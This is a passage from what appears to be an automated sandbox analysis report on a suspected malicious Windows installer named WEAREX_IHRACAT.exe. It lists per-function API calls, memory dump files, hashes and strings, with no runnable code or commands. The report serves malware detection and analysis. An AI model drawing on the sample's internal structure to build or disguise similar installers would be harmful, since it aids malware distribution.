                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                          • wsprintfW.USER32 ref: 00402CCF
                          • SetWindowTextW.USER32(?,?), ref: 00402CDF
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                          • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                          • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                          Function 100022EB Relevance: 9.1, APIs: 6, Instructions: 134memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?), ref: 10002391
                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                          • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                          • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                          • GlobalFree.KERNEL32(00000000), ref: 1000241A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                          • String ID:
                          • API String ID: 3579998418-0
                          • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                          • Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
                          • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                          • Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61
                          Function 10001617 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                          • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                          • GlobalFree.KERNEL32(00000000), ref: 1000165A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                          • String ID:
                          • API String ID: 1148316912-0
                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                          • DeleteObject.GDI32(00000000), ref: 00401D36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                          • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                          • Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                          • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(?), ref: 00401D44
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID:
                          • API String ID: 3808545654-0
                          • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                          • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                          • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                          • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                          Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                          • wsprintfW.USER32 ref: 00404A10
                          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                          • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                          • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                          • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                          • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                          • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                          • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                          Function 00405DB5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DDF
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E00
                          • RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E23
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Call
                          • API String ID: 3677997916-1824292864
                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                          • Instruction ID: afa83f24152e7e9ce060601fd796842ff4531c7984e311905aa048a3366a239a
                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                          • Instruction Fuzzy Hash: DC011A3115020AEADB218F56ED09EEB3BA8EF85354F00403AF945D6260D335DA64DBF9
                          Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00405939
                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00405943
                          • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3355392842
                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                          • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                          • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                          • String ID:
                          • API String ID: 1404258612-0
                          • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                          • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                          • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                          • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                          Function 00405106 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00405135
                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                            • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                          • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                          • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                          Function 0040381D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,752C2EE0,004037F4,752C3420,0040361F,?), ref: 00403837
                          • GlobalFree.KERNEL32(?), ref: 0040383E
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Free$GlobalLibrary
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1100898210-3355392842
                          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                          • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                          • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                          Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405985
                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405995
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-3370423016
                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                          • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
